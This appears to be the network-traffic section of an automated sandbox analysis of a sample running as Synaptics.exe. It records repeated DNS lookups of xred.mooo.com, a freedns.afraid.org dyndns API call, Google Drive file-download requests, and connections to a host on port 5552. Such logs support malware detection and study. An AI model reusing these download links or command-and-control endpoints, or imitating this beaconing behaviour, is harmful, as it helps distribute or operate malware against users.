                                                                                                                                Dec 24, 2024 18:21:51.040216923 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.079365969 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.087336063 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.950768948 CET44350117142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.950900078 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.951225996 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.951262951 CET44350117142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.951354027 CET50117443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.951440096 CET50129443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.951469898 CET44350129142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.951680899 CET50129443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.953043938 CET50129443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.953058958 CET44350129142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.955373049 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.955599070 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.955621958 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.955738068 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.955738068 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.955857038 CET44350118142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.956027031 CET50118443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.956285000 CET50130443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.956321001 CET44350130142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:51.956549883 CET50130443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.956717968 CET50130443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:51.956732035 CET44350130142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100346088 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100388050 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100399971 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.100415945 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100429058 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.100466013 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.100470066 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100509882 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.100621939 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100662947 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.100671053 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.100703955 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.101152897 CET50119443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.101164103 CET44350119142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.101906061 CET50131443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.101946115 CET44350131142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102555990 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102650881 CET50131443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.102710009 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102741003 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.102749109 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102758884 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.102794886 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.102799892 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102818012 CET50131443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.102833986 CET44350131142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.102842093 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.103341103 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.103403091 CET44350120142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.103457928 CET50120443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.103872061 CET50132443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.103909969 CET44350132142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.103965044 CET50132443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.104301929 CET50132443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.104325056 CET44350132142.250.181.97192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.662314892 CET50129443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.662412882 CET50130443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.662435055 CET50131443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.662477970 CET50132443192.168.2.4142.250.181.97
                                                                                                                                Dec 24, 2024 18:21:52.756345034 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.756402969 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.756546974 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.756865025 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.756875992 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.757771015 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.757803917 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:52.757882118 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.758393049 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:52.758405924 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:54.447761059 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:54.447824955 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:54.448477983 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:54.448539019 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:54.450927019 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:54.451008081 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:21:54.453639030 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:54.453697920 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:22:25.019725084 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:22:25.019753933 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:22:25.020062923 CET44350134142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:22:25.020119905 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:22:25.022504091 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:22:25.022533894 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:22:25.022809982 CET44350135142.250.181.14192.168.2.4
                                                                                                                                Dec 24, 2024 18:22:25.022865057 CET50135443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:22:25.023396969 CET4973980192.168.2.469.42.215.252
                                                                                                                                Dec 24, 2024 18:22:25.351049900 CET4973980192.168.2.469.42.215.252
                                                                                                                                Dec 24, 2024 18:22:25.713716030 CET555249801172.111.138.100192.168.2.4
                                                                                                                                Dec 24, 2024 18:22:25.756185055 CET498015552192.168.2.4172.111.138.100
                                                                                                                                Dec 24, 2024 18:22:25.990461111 CET4973980192.168.2.469.42.215.252
                                                                                                                                Dec 24, 2024 18:22:27.256369114 CET4973980192.168.2.469.42.215.252
                                                                                                                                Dec 24, 2024 18:22:29.802992105 CET4973980192.168.2.469.42.215.252
                                                                                                                                Dec 24, 2024 18:22:35.009377956 CET4973980192.168.2.469.42.215.252
                                                                                                                                Dec 24, 2024 18:22:45.209315062 CET4973980192.168.2.469.42.215.252
                                                                                                                                Dec 24, 2024 18:23:02.164540052 CET555249801172.111.138.100192.168.2.4
                                                                                                                                Dec 24, 2024 18:23:02.249927044 CET498015552192.168.2.4172.111.138.100
                                                                                                                                Dec 24, 2024 18:23:40.182858944 CET555249801172.111.138.100192.168.2.4
                                                                                                                                Dec 24, 2024 18:23:40.256505013 CET498015552192.168.2.4172.111.138.100
                                                                                                                                Dec 24, 2024 18:24:24.239329100 CET555249801172.111.138.100192.168.2.4
                                                                                                                                Dec 24, 2024 18:24:24.351897955 CET498015552192.168.2.4172.111.138.100
                                                                                                                                Dec 24, 2024 18:24:45.400036097 CET50134443192.168.2.4142.250.181.14
                                                                                                                                Dec 24, 2024 18:24:45.412161112 CET50135443192.168.2.4142.250.181.14

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 24, 2024 18:20:08.194804907 CET6192853192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:08.331937075 CET53619281.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:09.035408974 CET6478553192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:09.391309977 CET53647851.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:09.405034065 CET5125353192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:09.733597994 CET53512531.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:11.256824017 CET6200953192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:11.395231962 CET53620091.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:14.493029118 CET6342853192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:14.630218983 CET53634281.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:20.276966095 CET5911453192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:20.414733887 CET53591141.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:25.047069073 CET6221853192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:25.188361883 CET53622181.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:30.858095884 CET5350753192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:30.996345997 CET53535071.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:36.033828974 CET5240953192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:36.174249887 CET53524091.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:41.861645937 CET5456553192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:42.002228022 CET53545651.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:48.804393053 CET5176753192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:48.942670107 CET53517671.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:53.460629940 CET5283053192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:53.598891973 CET53528301.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:20:59.288552046 CET5225753192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:20:59.428158045 CET53522571.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:04.154181957 CET5193653192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:21:04.293766022 CET53519361.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:09.945254087 CET5770253192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:21:10.083967924 CET53577021.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:16.898288965 CET5110353192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:21:17.036549091 CET53511031.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:23.804244995 CET4980753192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:21:23.941631079 CET53498071.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:28.461503029 CET4964353192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:21:28.599781036 CET53496431.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:34.288791895 CET5226053192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:21:34.425652027 CET53522601.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:38.945310116 CET6545853192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:21:39.083194017 CET53654581.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:44.757802010 CET6551853192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:21:44.895529032 CET53655181.1.1.1192.168.2.4
                                                                                                                                Dec 24, 2024 18:21:49.430829048 CET5277853192.168.2.41.1.1.1
                                                                                                                                Dec 24, 2024 18:21:49.573714972 CET53527781.1.1.1192.168.2.4

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Dec 24, 2024 18:20:08.194804907 CET192.168.2.41.1.1.10x691fStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:09.035408974 CET192.168.2.41.1.1.10xf76aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:09.405034065 CET192.168.2.41.1.1.10xe7bdStandard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:11.256824017 CET192.168.2.41.1.1.10x2d1bStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:14.493029118 CET192.168.2.41.1.1.10x57ceStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:20.276966095 CET192.168.2.41.1.1.10x3e9eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:25.047069073 CET192.168.2.41.1.1.10x27a6Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:30.858095884 CET192.168.2.41.1.1.10xf0aaStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:36.033828974 CET192.168.2.41.1.1.10x1161Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:41.861645937 CET192.168.2.41.1.1.10xc03Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:48.804393053 CET192.168.2.41.1.1.10x15afStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:53.460629940 CET192.168.2.41.1.1.10x31dbStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:59.288552046 CET192.168.2.41.1.1.10xbd22Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:04.154181957 CET192.168.2.41.1.1.10x5da8Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:09.945254087 CET192.168.2.41.1.1.10x2fa7Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:16.898288965 CET192.168.2.41.1.1.10x331cStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:23.804244995 CET192.168.2.41.1.1.10xdde6Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:28.461503029 CET192.168.2.41.1.1.10xc121Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:34.288791895 CET192.168.2.41.1.1.10x3f98Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:38.945310116 CET192.168.2.41.1.1.10x235Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:44.757802010 CET192.168.2.41.1.1.10x9a3aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:49.430829048 CET192.168.2.41.1.1.10x94cbStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Dec 24, 2024 18:20:08.331937075 CET1.1.1.1192.168.2.40x691fNo error (0)docs.google.com142.250.181.14A (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:09.391309977 CET1.1.1.1192.168.2.40xf76aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:09.733597994 CET1.1.1.1192.168.2.40xe7bdNo error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:11.395231962 CET1.1.1.1192.168.2.40x2d1bNo error (0)drive.usercontent.google.com142.250.181.97A (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:14.630218983 CET1.1.1.1192.168.2.40x57ceName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:20.414733887 CET1.1.1.1192.168.2.40x3e9eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:25.188361883 CET1.1.1.1192.168.2.40x27a6Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:30.996345997 CET1.1.1.1192.168.2.40xf0aaName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:36.174249887 CET1.1.1.1192.168.2.40x1161Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:42.002228022 CET1.1.1.1192.168.2.40xc03Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:48.942670107 CET1.1.1.1192.168.2.40x15afName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:53.598891973 CET1.1.1.1192.168.2.40x31dbName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:56.867109060 CET1.1.1.1192.168.2.40x4b2bNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:56.867109060 CET1.1.1.1192.168.2.40x4b2bNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:20:59.428158045 CET1.1.1.1192.168.2.40xbd22Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:04.293766022 CET1.1.1.1192.168.2.40x5da8Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:10.083967924 CET1.1.1.1192.168.2.40x2fa7Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:17.036549091 CET1.1.1.1192.168.2.40x331cName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:23.941631079 CET1.1.1.1192.168.2.40xdde6Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:28.599781036 CET1.1.1.1192.168.2.40xc121Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:34.425652027 CET1.1.1.1192.168.2.40x3f98Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:39.083194017 CET1.1.1.1192.168.2.40x235Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:44.895529032 CET1.1.1.1192.168.2.40x9a3aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                Dec 24, 2024 18:21:49.573714972 CET1.1.1.1192.168.2.40x94cbName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • docs.google.com
                                                                                                                                • drive.usercontent.google.com
                                                                                                                                • freedns.afraid.org

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.44973969.42.215.252804076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Dec 24, 2024 18:20:09.854350090 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                User-Agent: MyApp
                                                                                                                                Host: freedns.afraid.org
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Dec 24, 2024 18:20:11.099803925 CET243INHTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:10 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                Vary: Accept-Encoding
                                                                                                                                X-Cache: MISS
                                                                                                                                Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.449735142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:10 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-90yWv6PG7lufRyx5lJfC7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.449734142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:10 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:11 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:10 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-jGPW1sJTuunetI_og-htvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.449742142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:20:13 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:13 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:13 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-QgONJF1PmzCzvjOF7-8biw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
